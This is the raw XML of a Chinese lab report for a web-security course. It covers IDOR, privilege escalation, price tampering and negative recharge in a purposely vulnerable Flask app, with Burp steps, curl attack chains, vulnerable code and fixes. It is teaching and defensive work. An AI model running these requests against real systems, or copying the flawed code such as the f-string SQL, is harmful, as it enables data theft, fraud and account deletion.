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48"/>
        </w:rPr>
        <w:t>权限提升与业务逻辑漏洞</w:t>
        <w:br/>
        <w:t>分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="454545"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>——越权漏洞·价格篡改·负值充值——</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验项目：Web安全漏洞分析与修复</w:t>
        <w:br/>
        <w:t>课程名称：网络安全实训</w:t>
        <w:br/>
        <w:t>报告日期：2026年7月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120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第1章  漏洞概述与风险评级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  水平越权漏洞（IDOR）分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  垂直越权漏洞分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  业务逻辑漏洞——商品价格篡改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  业务逻辑漏洞——负值充值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  Burp Suite实操全流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  修复方案详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第9章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  漏洞概述与风险评级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实验在Flask Web应用中发现了三大类安全漏洞，涉及越权访问和业务逻辑缺陷：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漏洞类型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漏洞名称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严重度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CVSS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水平越权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IDOR - 任意用户资料查看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垂直越权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未授权访问管理面板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垂直越权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未授权删除用户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9.6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业务逻辑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商品价格由客户端提交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业务逻辑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充值金额未校验正负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8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 漏洞思维导图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
        <w:t>水平越权(IDOR)：修改URL参数 → 查看他人信息 → 信息泄露</w:t>
        <w:br/>
        <w:t>垂直越权：直接访问/admin → 管理面板暴露 → 可删除任意用户</w:t>
        <w:br/>
        <w:t>业务逻辑：Burp拦截 → 修改price/amount → 低价购/负值充值</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  水平越权漏洞（IDOR）分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Insecure Direct Object Reference（IDOR）是指应用在访问资源时，直接使用用户提供的标识符（如ID），而未验证当前用户是否有权访问该资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 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@app.route("/profile", methods=["GET"])</w:t>
        <w:br/>
        <w:t>def profile():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    user_id = request.args.get("user_id")  # ⚠️ 用户可控</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sql = f"SELECT ... FROM users WHERE id = '{user_id}'"  # 无session校验</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("profile.html", user=profile_user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Burp Suite复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step1：登录普通用户alice（alice/alice2025）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step2：Burp拦截/profile?user_id=2的请求，将user_id改为1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GET /profile?user_id=1  ← 把2改成1</w:t>
        <w:br/>
        <w:t>→ 返回管理员admin的资料（邮箱、手机、余额¥99999）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step3：curl命令验证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'session=...' http://target:5000/profile?user_id=1</w:t>
        <w:br/>
        <w:t>curl -b 'session=...' http://target:5000/profile?user_id=2</w:t>
        <w:br/>
        <w:t>curl -b 'session=...' http://target:5000/profile?user_id=3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 攻击效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>任意登录用户可通过修改URL中的user_id参数，查看包括管理员在内的所有用户个人信息（邮箱、手机号、余额），造成大规模信息泄露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  垂直越权漏洞分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>垂直越权（Privilege Escalation）指低权限用户通过直接访问高权限URL，获得管理员等高级权限的操作能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 漏洞点1：未授权访问管理面板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@app.route("/admin", methods=["GET"])</w:t>
        <w:br/>
        <w:t>def admin_panel():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 仅检查了登录，未检查是否为管理员！</w:t>
        <w:br/>
        <w:t xml:space="preserve">    users = query_all_users()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("admin.html", users=users)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Burp复现：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普通用户alice直接访问</w:t>
        <w:br/>
        <w:t>GET /admin</w:t>
        <w:br/>
        <w:t>→ 返回所有用户列表，包含admin/alice等全部信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 漏洞点2：未授权删除用户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@app.route("/admin/delete-user", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def admin_delete_user():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    user_id = request.form.get("user_id")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ⚠️ 任何登录用户都可以删除任意用户！</w:t>
        <w:br/>
        <w:t xml:space="preserve">    DELETE FROM users WHERE id = user_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Burp复现：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POST /admin/delete-user</w:t>
        <w:br/>
        <w:t>Body: user_id=3</w:t>
        <w:br/>
        <w:t>→ 用户ID=3被永久删除，无需管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 curl命令验证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模拟普通用户越权访问管理面板</w:t>
        <w:br/>
        <w:t>curl -c /tmp/cookies.txt -X POST http://target:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'username=alice&amp;password=alice2025'</w:t>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt http://target:5000/admin</w:t>
        <w:br/>
        <w:t>curl -b /tmp/cookies.txt -X POST http://target:5000/admin/delete-user \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'user_id=1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  业务逻辑漏洞——商品价格篡改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>商品价格应由服务器从数据库获取。若价格由客户端表单提交，攻击者可通过Burp拦截修改price参数，以任意价格购买商品。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 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@app.route("/cart", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def cart():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    price = request.form.get("price")  # ⚠️ 客户端提交的价格不可信！</w:t>
        <w:br/>
        <w:t xml:space="preserve">    total = float(price) * int(quantity)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 服务器信任了客户端提交的价格，直接使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Burp复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step1：登录后访问/shop，点击加入购物车（iPhone 15 Pro Max ¥9999）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step2：Burp拦截POST /cart请求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POST /cart HTTP/1.1</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
        <w:t>product_id=1&amp;product_name=iPhone+15+Pro+Max&amp;price=9999&amp;quantity=1</w:t>
        <w:br/>
        <w:t xml:space="preserve">                              ⚠️ 把price=9999 改成 price=0.01</w:t>
        <w:br/>
        <w:t>→ 以￥0.01成功将iPhone加入购物车！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 curl命令验证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curl -b cookies.txt -X POST http://target:5000/cart \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'product_id=1&amp;product_name=iPhone&amp;price=0.01&amp;quantity=1'</w:t>
        <w:br/>
        <w:t># 返回总价 ¥0.01，原价¥9999的商品用1分钱买到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  业务逻辑漏洞——负值充值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>充值功能直接执行 balance = balance + amount，但未校验amount的正负。攻击者可提交负值来扣减任意用户的余额。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 漏洞代码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sql = f"UPDATE users SET balance = balance + {amount} ..."  # ⚠️ amount可为负数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Burp复现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POST /recharge HTTP/1.1</w:t>
        <w:br/>
        <w:t>Body: user_id=2&amp;amount=-100</w:t>
        <w:br/>
        <w:t>→ alice的余额从¥100变成¥0</w:t>
        <w:br/>
        <w:br/>
        <w:t>POST /recharge HTTP/1.1</w:t>
        <w:br/>
        <w:t>Body: user_id=1&amp;amount=-99999</w:t>
        <w:br/>
        <w:t>→ admin的余额从¥99999变成¥0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  Burp Suite实操全流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 环境搭建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git clone https://github.com/Zhang123456-rgb/2025141530175</w:t>
        <w:br/>
        <w:t>cd 2025141530175 &amp;&amp; pip install flask &amp;&amp; python app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Burp配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. 打开Burp Suite → Proxy → Proxy Settings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. 添加监听地址 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. 浏览器设置代理为 127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. 打开Intercept（拦截开关）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 攻击流程汇总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攻击类型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Burp操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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攻击效果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水平越权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拦截/profile请求，改user_id参数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查看任意用户信息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垂直越权1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直接访问/admin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进入管理面板(无需管理员)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垂直越权2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拦截/admin/delete-user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删除任意用户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价格篡改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拦截/cart请求，改price=0.01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1分钱买iPhone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负值充值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拦截/recharge请求，改amount=-99999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清空他人余额</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 完整攻击链示例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1. 登录alice</w:t>
        <w:br/>
        <w:t>curl -c /tmp/c.txt -X POST http://target:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'username=alice&amp;password=alice2025'</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. 水平越权：查看admin资料</w:t>
        <w:br/>
        <w:t>curl -b /tmp/c.txt 'http://target:5000/profile?user_id=1'</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3. 垂直越权：删除admin用户</w:t>
        <w:br/>
        <w:t>curl -b /tmp/c.txt -X POST http://target:5000/admin/delete-user \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'user_id=1'</w:t>
        <w:br/>
        <w:br/>
        <w:t># 4. 价格篡改：1分钱买iPhone</w:t>
        <w:br/>
        <w:t>curl -b /tmp/c.txt -X POST http://target:5000/cart \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'product_id=1&amp;product_name=iPhone&amp;price=0.01&amp;quantity=1'</w:t>
        <w:br/>
        <w:br/>
        <w:t># 5. 负值充值：扣减他人余额</w:t>
        <w:br/>
        <w:t>curl -b /tmp/c.txt -X POST http://target:5000/recharge \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d 'user_id=2&amp;amount=-100'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章  修复方案详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 IDOR修复——验证资源所有权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修复：从session获取当前用户，与请求的资源所有者比对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@app.route("/profile", methods=["GET"])</w:t>
        <w:br/>
        <w:t>def profile():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    user_id = request.args.get("user_id")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 获取当前用户</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("SELECT username,role FROM users WHERE id=?", (user_id,))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    target = c.fetchone()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if role != "admin" and target["username"] != session["username"]:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "权限不足"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 仅管理员可查看他人，普通用户只看自己</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 垂直越权修复——角色校验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修复：每个管理功能前检查当前用户的role是否为admin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@app.route("/admin", methods=["GET"])</w:t>
        <w:br/>
        <w:t>def admin():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    username = session.get("username")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("SELECT role FROM users WHERE username=?", (username,))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if c.fetchone()["role"] != "admin":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "权限不足，仅管理员可访问"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 价格篡改修复——服务端定价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修复：价格从数据库获取，不信任客户端提交的值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@app.route("/cart", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def cart():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 价格从数据库查询，拒绝客户端提交的价格</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("SELECT price FROM products WHERE id=?", (product_id,))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    real_price = c.fetchone()["price"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    total = real_price * int(quantity)  # 使用真实价格</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 负值充值修复——金额正校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 修复：校验amount必须为正数；验证用户只能给自己充值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@app.route("/recharge", methods=["POST"])</w:t>
        <w:br/>
        <w:t>def recharge():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    amount = float(request.form.get("amount"))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if amount &lt;= 0:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return "充值金额必须为正数"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("UPDATE users SET balance=balance+? WHERE id=?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">             (amount, user_id))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.5 最小权限原则实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>修复的核心是遵循最小权限原则：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>服务器不能信任任何客户端提交的权限相关数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>每个敏感操作都必须二次校验身份和权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>资源标识符必须结合session验证所有权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>关键数据（价格、金额）仅从服务端可信源获取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>所有越权行为记录审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第八章  修复前后代码对比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漏洞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有漏洞(app.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1A237E" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>已修复(app_fixed.py)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水平越权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user_id来自URL，无所有权校验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校验当前用户是否为目标用户本人或admin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垂直越权(admin)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仅检查登录，未检查role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检查session用户的role==admin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垂直越权(delete)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无任何权限检查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检查role==admin，记录审计日志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价格篡改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price来自表单提交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price从数据库products表查询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负值充值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amount未校验正负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amount&lt;=0时拒绝，限制只能给自己充值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>核心修复逻辑对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>有漏洞版本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="FFEBEE" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 信任一切客户端输入</w:t>
        <w:br/>
        <w:t>user_id = request.args.get("user_id")    # 未校验所有权</w:t>
        <w:br/>
        <w:t>price = request.form.get("price")        # 未从数据库获取</w:t>
        <w:br/>
        <w:t>amount = request.form.get("amount")      # 未校验正负</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E7D32"/>
        </w:rPr>
        <w:t>修复版本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="E8F5E9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 服务器端全覆盖校验</w:t>
        <w:br/>
        <w:t>if cur_user["role"] != "admin" and target != session["username"]: return "权限不足"</w:t>
        <w:br/>
        <w:t>real_price = c.fetchone()["price"]           # 从数据库取真实价格</w:t>
        <w:br/>
        <w:t>if amount &lt;= 0: return "金额必须为正数"       # 校验金额正负</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第九章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则一：永不信任客户端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户ID、价格、金额等关键数据必须来自服务端可信源（数据库/session），不能依赖客户端提交。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则二：二次权限校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>每个管理功能、每个敏感操作都必须校验当前用户是否有权执行。仅检查登录不够，必须检查角色。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则三：资源所有权验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户只能访问属于自己的资源。URL参数中的ID必须与当前用户session比对。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则四：业务逻辑边界校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>金额必须为正数、库存不能为负、折扣不能超过100%。业务逻辑的边界条件必须服务端校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则五：最小权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户只应有完成任务所需的最小权限。管理功能默认不开放，通过role显式授权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则六：审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有越权尝试、敏感操作必须记录日志，包括用户、时间、IP、操作内容，支持安全溯源。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="24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